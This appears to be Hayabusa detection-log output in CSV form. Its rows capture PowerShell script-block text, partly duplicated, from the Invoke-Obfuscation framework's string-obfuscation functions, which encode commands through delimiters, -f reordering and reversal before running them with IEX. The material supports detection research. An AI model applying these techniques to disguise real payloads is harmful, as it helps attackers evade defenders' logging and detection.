If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. 
If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.249 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. 
$ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. 
$FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. 
$Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. 
$RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. 
If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. 
$SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:15:55.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. 
For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. 
If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. 
# This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. $RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. 
$RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. 
